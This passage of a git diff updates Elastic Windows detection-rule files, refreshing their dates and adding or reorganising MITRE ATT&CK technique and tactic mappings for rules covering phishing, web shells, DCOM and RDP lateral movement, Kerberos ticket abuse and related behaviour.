id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -141,22 +144,60 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml index c1bfe3cbe84..051751fafd3 100644 --- a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml +++ b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/24" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,22 +86,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -112,10 +115,43 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_url_cve_2025_33053.toml b/rules/windows/initial_access_url_cve_2025_33053.toml index 17c356f8d2c..6f022a55f11 100644 --- a/rules/windows/initial_access_url_cve_2025_33053.toml +++ b/rules/windows/initial_access_url_cve_2025_33053.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/11" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/06/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,10 +84,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -103,18 +105,38 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml index 7a7e8c67522..123281bc710 100644 --- a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml +++ b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/29" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,10 +96,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -110,18 +112,19 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -137,22 +140,45 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/initial_access_webshell_screenconnect_server.toml b/rules/windows/initial_access_webshell_screenconnect_server.toml index fbe76f594f5..261f5786467 100644 --- a/rules/windows/initial_access_webshell_screenconnect_server.toml +++ b/rules/windows/initial_access_webshell_screenconnect_server.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,22 +92,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -118,10 +121,25 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_xsl_script_execution_via_com.toml b/rules/windows/initial_access_xsl_script_execution_via_com.toml index 2a1b8903abd..0e82b88b145 100644 --- a/rules/windows/initial_access_xsl_script_execution_via_com.toml +++ b/rules/windows/initial_access_xsl_script_execution_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,31 +82,64 @@ The Microsoft.XMLDOM COM interface allows applications to parse and transform XM [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_cmd_service.toml b/rules/windows/lateral_movement_cmd_service.toml index 3e17c1558a3..7f787510c06 100644 --- a/rules/windows/lateral_movement_cmd_service.toml +++ b/rules/windows/lateral_movement_cmd_service.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,48 +80,54 @@ sequence by process.entity_id with maxspan = 1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml index ecce43b56cd..4453dc6b459 100644 --- a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml +++ b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/28" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/12/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,33 +99,39 @@ sequence by source.port, source.ip with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.003" name = "Pass the Ticket" reference = "https://attack.mitre.org/techniques/T1550/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" - +[[rule.threat.technique.subtechnique]] +id = "T1558.004" +name = "AS-REP Roasting" +reference = "https://attack.mitre.org/techniques/T1558/004/" [rule.threat.tactic] id = "TA0006" diff --git a/rules/windows/lateral_movement_dcom_hta.toml b/rules/windows/lateral_movement_dcom_hta.toml index 4f7be9dafd2..e232e9ab815 100644 --- a/rules/windows/lateral_movement_dcom_hta.toml +++ b/rules/windows/lateral_movement_dcom_hta.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,36 +85,54 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_dcom_mmc20.toml b/rules/windows/lateral_movement_dcom_mmc20.toml index edec6ac25c0..931dc6bc10e 100644 --- a/rules/windows/lateral_movement_dcom_mmc20.toml +++ b/rules/windows/lateral_movement_dcom_mmc20.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,36 +84,54 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml index 99d6bbb8067..023860a5a08 100644 --- a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml +++ b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,19 +85,36 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_evasion_rdp_shadowing.toml b/rules/windows/lateral_movement_evasion_rdp_shadowing.toml index b0a6ce543ed..b3aa744287d 100644 --- a/rules/windows/lateral_movement_evasion_rdp_shadowing.toml +++ b/rules/windows/lateral_movement_evasion_rdp_shadowing.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,19 +104,31 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1113" +name = "Screen Capture" +reference = "https://attack.mitre.org/techniques/T1113/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/lateral_movement_execution_from_tsclient_mup.toml b/rules/windows/lateral_movement_execution_from_tsclient_mup.toml index a6329dc5a9d..002889aff11 100644 --- a/rules/windows/lateral_movement_execution_from_tsclient_mup.toml +++ b/rules/windows/lateral_movement_execution_from_tsclient_mup.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/11" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,19 +91,23 @@ process where host.os.type == "windows" and event.type == "start" and process.ex [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" - +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml index 9f04832e1d8..3b8a8380436 100644 --- a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml +++ b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -145,19 +145,23 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_incoming_wmi.toml b/rules/windows/lateral_movement_incoming_wmi.toml index 8dbb6d82a42..a2831b84880 100644 --- a/rules/windows/lateral_movement_incoming_wmi.toml +++ b/rules/windows/lateral_movement_incoming_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,26 +99,31 @@ sequence by host.id with maxspan = 20s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/lateral_movement_rdp_sharprdp_target.toml b/rules/windows/lateral_movement_rdp_sharprdp_target.toml index 2ba965eb464..a32563cd490 100644 --- a/rules/windows/lateral_movement_rdp_sharprdp_target.toml +++ b/rules/windows/lateral_movement_rdp_sharprdp_target.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,19 +90,41 @@ Remote Desktop Protocol (RDP) enables users to connect to and control remote sys [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml index 197d4339c52..75ea925dba0 100644 --- a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml +++ b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,19 +90,41 @@ process where host.os.type == "windows" and event.type == "start" and user.id != [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" + +[[rule.threat.technique.subtechnique]] +id = "T1074.002" +name = "Remote Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/002/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/lateral_movement_remote_service_installed_winlog.toml b/rules/windows/lateral_movement_remote_service_installed_winlog.toml index 374035f3dfd..aaa83582136 100644 --- a/rules/windows/lateral_movement_remote_service_installed_winlog.toml +++ b/rules/windows/lateral_movement_remote_service_installed_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,31 +101,49 @@ sequence by winlog.logon.id, winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = 